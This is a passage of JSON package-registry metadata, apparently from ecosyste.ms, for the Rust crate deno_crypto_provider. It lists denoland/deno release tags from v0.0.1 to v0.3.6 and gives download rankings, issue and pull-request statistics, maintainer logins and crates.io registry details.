/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T15:22:18.387Z","dependent_packages_count":0,"downloads":75609,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.74079484778963,"dependent_repos_count":21.17622246684705,"dependent_packages_count":28.041378175121658,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":47.98613182991945},"purl":"pkg:cargo/deno_crypto_provider","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_crypto_provider","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_crypto_provider","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_crypto_provider/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_crypto_provider/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-06-23T09:38:42.648Z","updated_at":"2025-06-23T09:38:42.648Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-06-23T09:38:42.704Z","updated_at":"2025-06-23T09:38:42.704Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":10786760,"name":"deno_package_json","ecosystem":"cargo","description":"package.json implementation for the Deno 